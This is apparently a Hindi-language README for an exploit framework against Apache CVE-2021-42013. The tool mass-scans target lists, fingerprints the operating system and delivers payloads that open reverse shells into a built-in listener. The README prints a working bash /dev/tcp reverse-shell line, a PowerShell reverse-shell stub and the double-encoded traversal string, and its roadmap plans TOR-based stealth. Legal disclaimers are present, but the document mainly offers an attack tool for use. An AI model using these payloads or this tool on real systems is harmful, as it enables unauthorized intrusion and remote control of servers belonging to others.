
Apache Path Traversal + RCE (CVE-2021-42013) कमजोरी का पता लगाने और उसका फायदा उठाने के लिए डिज़ाइन किया गया एक उन्नत स्कैनिंग, शोषण और रिमोट इंटरैक्शन टूल, जो गलत कॉन्फ़िगर किए गए सर्वरों पर काम करता है।
# 🔥 CVE-2021-42013 शोषण ढाँचा Makaveli द्वारा
> 💀 बहुआयामी कॉस्मिक हैकर मोड सक्रिय...
एक उन्नत स्कैनिंग, शोषण और रिमोट इंटरैक्शन टूल जो गलत कॉन्फ़िगर किए गए सर्वरों में **Apache Path Traversal + RCE (CVE-2021-42013)** भेद्यता का पता लगाने और उसका दोहन करने के लिए डिज़ाइन किया गया है।
---
## ⚠️ कानूनी चेतावनी
> यह सॉफ्टवेयर केवल शैक्षिक और नियंत्रित वातावरण में अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
इस उपकरण का बिना स्पष्ट प्राधिकरण के सिस्टम के विरुद्ध उपयोग अवैध हो सकता है और कई देशों में अपराध माना जाता है।
लेखक इस कोड के दुरुपयोग के लिए जिम्मेदार नहीं है। इसे अपने जोखिम पर और हमेशा लक्ष्य प्रणाली के मालिक की स्पष्ट अनुमति के साथ उपयोग करें।
---
🧠 तकनीकी विवरण
यह उपकरण निम्नलिखित की अनुमति देता है:
- ✅ एक `.txt` फ़ाइल से एकाधिक लक्ष्यों को स्कैन करना।
- ✅ CVE-2021-42013 की उपस्थिति का स्वचालित रूप से पता लगाना।
- ✅ रिमोट ऑपरेटिंग सिस्टम (Linux या Windows) की पहचान करना।
- ✅ पहचाने गए सिस्टम के अनुसार अनुकूलित पेलोड भेजना।
- ✅ एक रिवर्स शेल स्थापित करना और रिमोट एक्सेस प्राप्त करना।
- ✅ एकीकृत लिस्नर के माध्यम से वास्तविक समय में शेल के साथ बातचीत करना।
- ✅ उन्नत लॉग, प्रगति पट्टी और इंटरैक्टिव मेनू का आनंद लेना।
---
## 🔧 आवश्यकताएँ
- Python **3.8+**
- Unix/Linux/MacOS आधारित सिस्टम (`subprocess` और `curl` का उपयोग)
- निम्नलिखित Python लाइब्रेरीज़ की आवश्यकता है:
```bash
pip install -r requirements.txt
```
**`requirements.txt`**
```
rich
alive-progress
```
आपको ऑपरेटिंग सिस्टम में `curl` स्थापित होना चाहिए।
---
## 📁 फ़ाइल संरचना
```
.
├── POC-CVE.py # मुख्य स्क्रिप्ट
├── logs.txt # स्वचालित रूप से उत्पन्न लॉग फ़ाइल
├── requirements.txt # Python निर्भरताएँ
└── targets.txt # (वैकल्पिक) स्कैन करने के लिए URL की सूची
```
---
## 🚀 इंटरैक्टिव उपयोग
```bash
python3 POC-CVE.py
```
इनमें से चुनें:
* `scan_file`: एक फ़ाइल से एकाधिक URL स्कैन करता है और दिखाता है कि कौन से असुरक्षित हैं।
* `exploit`: एकल लक्ष्य का सीधा शोषण, रिवर्स शेल के साथ।
* `exit`: इंटरैक्टिव मोड से बाहर निकलें।
---
## 🔍 बड़े पैमाने पर स्कैनिंग (scan\_file)
1. URLs की एक सूची के साथ एक फ़ाइल बनाएँ, प्रति पंक्ति एक:
```txt
http://example.com
http://victim.net
http://192.168.1.100
```
2. स्कैनिंग शुरू करें:
```bash
python3 POC-CVE.py
```
`scan_file` चुनें और प्रदान करें:
* फ़ाइल का पथ
* समानांतर स्कैनिंग के लिए थ्रेड की संख्या
---
## 💥 शोषण (exploit)
1. मेनू में `exploit` चुनें।
2. दर्ज करें:
* लक्ष्य का URL
* शेल प्राप्त करने के लिए आपका स्थानीय IP (`LHOST`)
* लिस्नर के लिए एक मुक्त पोर्ट (`LPORT`)
स्क्रिप्ट:
* लक्ष्य असुरक्षित है या नहीं, इसका पता लगाएगा।
* रिमोट ऑपरेटिंग सिस्टम के अनुसार उपयुक्त पेलोड भेजेगा।
* एक **लिस्नर** खोलेगा और आपको इंटरैक्टिव एक्सेस प्रदान करेगा।
---
## 🧪 पेलोड के उदाहरण
### Linux Payload (Bash TCP Reverse Shell)
```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```
### Windows Payload (PowerShell TCP Reverse Shell)
```powershell
powershell -NoP -NonI -W Hidden -Command ...
```
---
## 🧠 उपयोग की गई तकनीकें
* दोहरी एन्कोडिंग के साथ पथ ट्रावर्सल (`/.%252e/.%252e/.%252e`)
* `curl` के माध्यम से कमांड इंजेक्शन
* बाईपास हेडर (`User-Agent`, `Accept`, आदि)
* रिमोट नियंत्रण के लिए रिवर्स शेल
* मल्टीथ्रेडिंग और प्रगति पट्टी (Alive Progress)
* टाइमस्टैम्प और Rich Console के साथ लॉगिंग
---
## 📌 CVE संदर्भ
* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **हमला वेक्टर**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **प्रभाव**: RCE (Remote Code Execution)
* **CVSS स्कोर**: 9.8 (गंभीर)
---
## 🧙♂️ लेखक
* ✨ **Makaveli** — *"अपनी खुद की वास्तविकता को हैक करें"*
---
## 🛡️ अस्वीकरण
> यह प्रोजेक्ट "जैसा है वैसा" प्रदान किया जाता है, बिना किसी गारंटी या इसके उपयोग से होने वाली क्षति के लिए जिम्मेदारी के।
> **कभी भी किसी सिस्टम को उसके मालिक की स्पष्ट सहमति के बिना स्कैन या शोषण न करें।**
---
## ✅ अच्छी प्रथाएँ
* इस स्क्रिप्ट का उपयोग केवल **प्रयोगशाला वातावरण** या अधिकृत परीक्षणों में करें।
* सुनिश्चित करें कि लिस्नर के लिए परिभाषित पोर्ट **खुला** और **फायरवॉल मुक्त** है।
* जब तक अत्यंत आवश्यक न हो, सामान्य उपयोगकर्ता (रूट नहीं) के रूप में चलाएँ।
---
## 🧩 भविष्य का रोडमैप (वैकल्पिक)
* [ ] अनुकूलित पेलोड के लिए समर्थन
* [ ] परिणामों का CSV/JSON में निर्यात
* [ ] हेडर रोटेशन और TOR प्रॉक्सी के साथ स्टील्थ मोड
* [ ] स्थानीय वेब इंटरफ़ेस (Flask)
```
---
```
---
@DonMakaveliw, क्या आप भविष्य बनाने के लिए तैयार हैं?
---
<p align="center">
<img src="https://img.shields.io/badge/License-MIT-blue.svg" />
<img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&logo=python&logoColor=FFD43B" />
<img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
<img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
<img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
<img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
<img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
<img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>